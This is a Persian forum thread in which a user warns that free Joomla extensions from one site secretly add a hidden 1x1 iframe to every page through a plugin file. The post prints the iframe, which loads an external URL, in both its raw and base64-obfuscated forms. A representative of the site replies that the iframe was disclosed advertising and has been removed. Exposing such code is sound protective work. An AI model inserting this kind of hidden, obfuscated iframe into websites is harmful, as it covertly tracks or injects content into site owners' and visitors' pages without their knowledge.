tack

هشدار بسیار جدی در خصوص افزونه های جوملای رایگان

2 پست در این موضوع

ارسال شده در (ویرایش شده)

سلام

دوستان بار ها و بار ها بحث شده که همیشه هکر ها و افراد سود جو همیشه کد های مخرب و جاسوسی خودشونو تحت نرم افزار های و محصولات پولی ( قفل شکسته یا کرکی و یا وارز ) عرضه میکنن این داستان از سیستم های محتوا رو هم شامل میشود در تاپیک قبلی پی برده بودم که شرکت جومی در یکی از افزونه های خود کاربران که از افزونه های خود استفاده میکنند را جاسوسی میکنند در اقدام جدید جومی در این کامپوننت ها این کد ها کد شده و جستجو برای پیدا کردن کد ها رو سخت کرده

مثال زیر را ببنید :

کد جاسوسی خام :

<IFRAME style="display:none;" SRC="http://www.*****.ir/dl/google.html" WIDTH=1 HEIGHT=1></IFRAME>

کد که کد شده :

PElGUkFNRSBzdHlsZT0iZGlzcGxheTpub25lOyIgU1JDPSJodHRwOi8vd3d3Lmpvb21pLmlyL2Rs
L2dvb2dsZS5odG1sIiBXSURUSD0xIEhFSUdIVD0xPjwvSUZSQU1FPg==

خیلی مواظب نصب حتی یه ماژول هم باشید چون دیدم با نصب یه افزونه برای اسلاید شو یه فایل هم داره برای پلاگین که در \plugins\content\ یه فایل ایجاد کرده و کد خود را در تمامی صفحات سایت شما جایگذاری میکنند.. !!!!

ویرایش شده در توسط tack

Share this post


Link to post
Share on other sites
آموزش ووکامرس قالب جوملا قالب وردپرس قالب رایگان وردپرس قالب رایگان جوملا هاست نامحدود هاست جوملا هاست لاراول هاست وردپرس هاست ارزان هاست ربات تلگرام خرید دامنه آموزش ساخت ربات تلگرام با php آموزش لاراول آموزش cPanel آموزش php آموزش فرم ساز RSform آموزش ساخت ربات جذب ممبر آموزش ساخت ربات دوستیابی آموزش ساخت ربات فروشگاهی برای ووکامرس آموزش طراحی سایت داینامیک با php آموزش بخش پشتیبانی با rsticket

طبق هماهنگی با مدیر ارسال می شود:

با سلام خدمت تمام دوستان

همینطور با تشکر ویژه از مدیر انجمن و مسئولین انجمن که اجازه نام بردن از نقاط ضعف و قوت دیگر سایت ها را در انجمن می دهند.

با توجه به نکات ذکر شده در مورد سایت مذکور و نظرات دوستان، بنده به عنوان نماینده این سایت این حق را می بینم که پاسخی به این نظرات بدهم (سعی میکنم جنبه تبلیغاتی پیدا نکند):

۱- در زمینه با این کد باید گفت که این کد تنها یک کد تبلیغاتی بوده و برای مدیران این سایت تنها جنبه تبلیغاتی داشته که تنها در محصولات رایگان این سایت وجود داشت و از نظر امنیتی هیچ مشکلی ایجاد نمی کرده است.

۲- در موضوع با پنهانی بودن باید عرض کنم که در طی مراحل دانلود محصولات رایگان از این سایت، وجود این فریم به مشتری اطلاع داده می شده و تا مشتری آن را تایید نمی کرده امکان دانلود محصول را نداشته است در نتیجه این کد به هیچ عنوان بدون اجازه بر روی سایت میزبان اجرا نمی شده.

۳- کسانی که بعضا در محصولات تجاری این مشکل را داشته اند به دلیل استفاده از افزونه های رایگان در این محصولات بوده است.

۴- با این حال همانطور که مدیران فهیم انجمن مشکلات این موضوع را فرمودند با بررسی های مکرر کارشناسان سایت و تحقیقات و نظر سنجی از مشتریان، گروه به این نتیجه رسید این کد را از تمامی محصولات سایت به صورت کامل حذف نماید.

تمامی محصولات این سایت علاوه بر روز رسانی دیگر دارای این کد نبود و علاقه مندان می توانند محصولات خود را آپدیت نمایند.

کسانی که سایت خود را با این محصولات آماده نموده اند و این کد را در محصولاتشان دارند می توانند با پشتیبانی سایت مذکور تماس حاصل نمایند تا توسط کارشناسان راهنمایی شوند.

در انتها از تمامی دوستان به ویژه مدیر انجمن تشکر ویژه میکنم که بستر این بحث ها را فراهم کردند.

مهدی ریاحی

مسئول پشتیبانی سایت جومی

Share this post


Link to post
Share on other sites

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری